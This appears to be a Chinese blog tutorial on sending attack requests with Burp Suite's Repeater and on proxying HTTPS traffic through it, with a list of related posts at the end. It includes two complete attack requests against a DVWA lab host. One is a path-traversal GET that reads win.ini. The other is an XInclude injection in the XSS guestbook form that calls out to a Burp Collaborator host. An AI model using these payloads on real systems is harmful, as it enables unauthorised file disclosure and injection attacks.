如何用burpsuite进行攻击
一、使用Burpsuite进行攻击:
1、第一步打开burpsuite:
2、第二部点击Repeater:
3、第三步点击粉笔形状的按钮:
4、输入要攻击目标的ip地址与端口号
5、添加攻击报文,进行攻击
6、查看响应结果
完整界面展示如下
注意:
添加攻击报文时:
1、一定不要修改别人的报文,否则会出错!
2、请求头与请求体之间要空两格,否则会导致报文发不出去。
末尾在给大家附上两攻击报文:
Get:攻击报文:
GET /vulnerabilities..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/sqli/
Connection: close
Cookie: security=low; seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1
post:攻击报文:
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Connection: close
Cookie: seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1
txtName=%3cihc%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2fpe760gj443bccsu5t0qhzp801r7tvjjk7cu2ir.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fihc%3e&mtxMessage=dasdsa&btnSign=Sign+Guestbook
二、使用BurpSuite拦截HTTPS请求:
网站:https://www.cnblogs.com/lsdb/p/6824416.html
以:FireFox为例:
1、第一步打开工具栏:
2、点击选项:
3、点击常规:
4、找到--网络设置--点击设置:
5、手动代理配置--配置--确定
6、访问:访问http://burp/
7、下载证书
三、burp suite拦截对应请求包并发送intruder
网站:https://jingyan.baidu.com/article/17bd8e522d778185ab2bb8fe.html
四、BrupSuite只拦截特定网站的数据包
网站:https://www.cnblogs.com/lsdb/p/9026109.html
如何用burpsuite进行攻击相关推荐
- burpsuite csrf攻击_WEB安全之CSRF
大家好,我是阿里斯,一名IT行业小白.今天分享的内容是CSRF相关知识,不求表哥们打赏,只求点点在看,点点转发. CSRF漏洞概述 CSRF(Cross-Site Request Forgery),中 ...
- burpsuite csrf攻击_CSRF攻击的BurpSuite实战
今天做的是CSRF越权攻击,原理是通过在自己网站或者目标网站,通过模拟发包,替客户端发送请求. 环境配置 考虑其危害性,虽然不是很大,但是考虑到安全问题,所以本次演示需自己搭建实验环境,主要内容是用P ...
- burpsuite WEB渗透工具的基本使用
burpsuite用于攻击web 应用程序的集成平台,包含了许多工具. burpsuite下载地址:Download Burp Suite Community Edition - PortSwigge ...
- 【web安全】Web应用隔离防护之Web弱口令爆破
背景 近些年来,国内政府和企业网站被篡改的类似黑客攻击入侵事件频出,造成的社会影响及经济损失巨大,越来越多的企事业单位高度重视Web应用安全. 其中,黑客针对Web应用资产发起的弱口令攻击尤为常见. ...
- wechall靶场training系列通关记录
wechall靶场Training系列通关记录 Training: Get Sourced 第一题很简单,获取藏在网页源代码中的密码.F12查看网页中的注释即可找到答案: Training: Steg ...
- 论文笔记:Object Detection in 20 Years: A Surve(目标检测20年研究综述)
文章目录 1.介绍 2.目标检测的20年发展历程 2.1.目标检测路线 2.1.1.里程碑:传统检测器 2.1.2.基于CNN的两阶段检测器 2.1.3.基于CNN的单阶段检测器 2.2.目标检测数据 ...
- 没有相爱,只有相杀:微软和谷歌又撕上了...
西雅图IT圈:seattleit [今日作者]Dexter 读书巨慢理事会会长 科技圈算的上巨头的公司并不多:微软亚麻,谷歌苹果等(这里没算上资历尚浅的Fb),然而他们之间的关系却不是一般的错综复杂- ...
- OggBoard:无聊游戏的终结者
下一代棋盘游戏会是什么样子呢?你是否想象过可以直接在餐桌上显示一场逼真的战斗,你可以在任何角度观看这场战斗,还可以指挥战士们移动,并能看到战士们肉搏,也可以看到魔法师们是如何用魔法互相攻击. 听起来相 ...
- 渗透测试 ( 8 ) --- Burp Suite Pro 官方文档、Brida(frida)
Burp Suite 官网 :https://portswigger.net/burp 官方文档:https://portswigger.net/burp/documentation/desktop ...
最新文章
- 开关设备对于数据中心正常运行时间很重要!
- Delphi编译报错对照表
- linux svn 自动部署,linux下svn安装和自动部署
- mysql多个分类取n条_MySQL获取所有分类和每个分类的前N条记录
- jQuery原理第五天
- [z] Flare-兼容Memcached协议的分布式(key/value store)键值存储系统
- python绘制折线图先对数据进行处理_python气象数据分析并绘制折线图-女性时尚流行美容健康娱乐mv-ida网...
- beanfactory的实现类_ApplicationContext和BeanFactory的区别
- servlet实现mvc
- AAAI2021-基于对比学习的三元组生成式抽取方法
- 通达信期货接口有必要开通五档行情?
- 程序员的 10 款代码表白特效,一个比一个浪漫
- 不存在有效_曝光!吕梁这些单位存在安全隐患!
- 哪些英语用法是普通中国学生最生疏的?
- 4G LTE是什么意思
- 从零开始搭建ROS移动机器人系列之(四)直流电机PWM调速
- 9.Django应用及分布式路由
- C++递归算法之分成互质组
- logrotate 详解
- php许愿墙mysql_许愿墙的搭建(基于Apache+php+mysql)